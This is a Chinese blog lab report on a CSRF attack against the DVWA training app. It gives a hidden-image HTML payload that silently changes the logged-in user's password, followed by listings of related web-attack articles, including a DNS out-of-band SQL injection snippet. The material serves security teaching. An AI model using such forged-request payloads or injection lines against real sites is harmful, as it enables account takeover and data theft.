CSRF漏洞实验报告

最新推荐文章于 2024-06-14 16:51:07 发布
最新推荐文章于 2024-06-14 16:51:07 发布
阅读量1.8k 收藏 9
点赞数 2
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/104503082
版权

实验环境:DVWA、Apache

实验原理

CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的身份(cookie)完成攻击行为

实验内容

实验一:修改密码(低级别DVWA)

1.构造一个网址:http://192.168.1.101/1.html

html代码如下:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<img hidden src="http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=666&password_conf=666&Change=Change#" alt="">
</script>
</body>
</html>

2.当用户点击该网址时,DVWA密码就会被改成“666”,以下是登录成功界面

最低0.47元/天 解锁文章
没有如果ru果
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
跨站请求伪造——CSRF攻击实验报告
shshuahw的博客
08-09 2301
跨站请求伪造是Web安全中最基础的一个实验,由于现在网站的防护措施做的比较完善,已经不怎么能见到这种攻击了,更多的是下一篇博客所讲述的跨站脚本攻击(XSS) 这个实验比较简单,所以百分之五十的时间花在摸索docker的使用上。。 一.环境搭建 1.搭建docker并获得docker下的shell 创建docker镜像 由下图可见docker镜像创建成功,接下来启动docker 输入dockps查看攻击者的容器id,输入docksh id获得docker下的一个shell 2.修改配置文件/etc/ho
CSRF总结(一)
qq_43511094的博客
03-17 5062
文件包含漏洞相关知识总结 文件包含漏洞概念 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入 2. 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 常见文件包含函数 include() require() include_once
DVWA之CSRF(跨站请求伪造攻击)
热门推荐
谢公子的博客
10-01 1万+
目录 Low Middle High Impossible Low 源代码: &lt;?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; ...
CSRF(跨站请求伪造)漏洞 (带靶场演示+漏洞挖掘)
最新发布
wudideaqing的博客
06-14 2242
链接点击。
WEB安全的学习总结与心得(七)——CSRF漏洞
weixin_44681434的博客
05-10 500
WEB安全的学习总结与心得(七) 01 CSRF漏洞之简介 属性 属性 介绍 英文全称 Cross-site request forgery 中文全称 跨站请求伪造 危害 执行恶意操作(如被转账);制造蠕虫等 漏洞类型 客户端漏洞 定义 利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。 CSRF漏洞触发机制 ...
CSRF漏洞(原理、DVWA实验、修复建议)
coderge's CSDN Blog.
09-20 2713
目录 1 介绍CSRF漏洞 2 CSRF漏洞的原理 3 DVWA CSRF实验过程 3.1 low级别 3.2 medium级别 相关函数说明 3.3 high级别 3.4 impossible级别 4 CSRF漏洞修复建议 1 介绍CSRF漏洞 CSRF (Cross -site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)
DVWA 实验报告:3、跨站请求伪造 CSRF
看那白熊
05-14 1613
跨站请求伪造的复现
实验33:csrf漏洞概述及原理
qq_44720671的博客
04-29 281
csrf漏洞概述及原理 csrf全称为:Cross-site request forgery 正常情况下,某人A想要修改自己的个人信息,需要登录(得到权限),再点击提交(修改请求),这样就完成了修改。 若另一个人B想要修改A的个人信息,就需要有A的权限,可以将修改个人信息的请求进行修饰,引诱A在登录状态下点击,攻击成功! 成功原因: 1、该网站没有进行防CSRF漏洞处理,导致请求容易被伪造。 因...
SQL注入实验报告
fencecat的博客
12-31 1万+
实验项目 SQL注入 综合性实验 2020年9月25日 一、实验综述 1.实验目的及要求 创建VMWARE虚拟机 的Windows环境, 在虚拟机中安装phpstudy,并搭建DVWA环境,通过学习web工作原理与SQL注入工作原理,能够实现简单的SQL注入验证。 2.实验仪器、设备或软件 Vmware DVWA phpStudy 3.实验原理 (1)Web工作原理: Web服务器的本质就是 接收数据 ⇒ HTTP解析 ⇒ 逻辑处理 ⇒ HTTP封包 ⇒ 发送数据。 Web服务器的工作流...
软件安全分析与应用实验报告
01-05
学习识别CSRF漏洞并实施预防措施。 4. Web应用防火墙(WAF):WAF能够过滤恶意流量,保护Web服务器免受攻击。了解WAF的工作原理和配置。 二、逆向工程 逆向工程是研究软件内部工作原理的过程,对于软件安全分析至关...
华中科技大学信息系统安全实验报告.zip
06-11
《华中科技大学信息系统安全实验报告》是对信息安全领域深入探索的一份详实资料,涵盖了软件安全、Web安全以及新兴的区块链技术。这篇实验报告旨在通过理论与实践相结合的方式,让学生理解和掌握信息系统安全的关键...
信息安全工程实验报告(附HOOK源码)
07-01
实验四 经典Web漏洞-在线靶场完成的(暴力破解、验证码绕过、XSS、CSRF、SQL注入、远程代码执行、文件包含、文件下载和上传、越权漏洞)基本所有的在线靶场实验都做了 实验五 Windows系统中的HOOK技术(1.了解...
跨站攻击(XSS+CSRF).docx
01-05
5. 撰写实验报告,注重规范性、逻辑性和表达清晰度。 实验过程中,学生将使用Burp Suite等工具进行HTTP请求的抓包和篡改,以模拟攻击过程,同时也会学习如何修复这些漏洞,提高Web应用的安全性。 总结来说,XSS和...
基于python的Web渗透(内含源码和实验报告).zip
12-11
Web应用漏洞主要包括SQL注入、跨站脚本(XSS)、文件包含、命令注入、跨站请求伪造(CSRF)等。了解这些漏洞的原理、检测方法和利用技巧是Web渗透的核心内容。例如,SQL注入是通过构造恶意SQL语句来获取或篡改数据库...
信息泄露漏洞
cxrpty的博客
03-04 6068
信息泄露主要包括:敏感路径、服务器、中间件、框架版本等 实验环境:ubuntu 实验原理: 配置存放不当,导致web系统备份,数据库备份 用户数据文件,暴露在web系统上,引发信息泄露 实验内容: 一、目录遍历漏洞 原理:index文件是web应用程序的默认入口文件被称为索引文件。访问web应用程序时如果没有 指定某个文件,web应用程序就会调用索引文件。根据web开发脚本...
sql注入——sqlserver报错注入
cxrpty的博客
02-12 5969
该注入的条件是必须有报错信息 用到函数convert(int,(select top 1 db_name() )),其含义是将第二个参数的值转换成第一个参数的int类型 一、打开文件,如下图所示,有报错信息: 二、查看数据库 输入:http://192.168.1.106/1.php?id=1 and 1=convert(int,(select top 1 db_name()));这里...
.htaccess文件解析漏洞
cxrpty的博客
02-17 4055
一、.htaccess文件 该文件提供了针对目录改便配置的方法。即在一个特定的文档目录中放置一个包含一个或者多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 二、apache的解析漏洞 ...
sql注入——dns的带外注入
cxrpty的博客
02-10 3604
以sql labs8为例 1.搜索dns.log在线软件,并get一个域名 2.在cmd中ping该域名,发现解析成功 3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行 4.在dn...
csrf漏洞dvwa
09-13
CSRF(Cross-Site Request Forgery)是一种常见的Web应用程序安全漏洞,导致攻击者利用受害者的身份执行恶意操作。DVWA(Damn Vulnerable Web Application)是一个故意设计的Web应用程序,用于演示各种Web安全漏洞。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值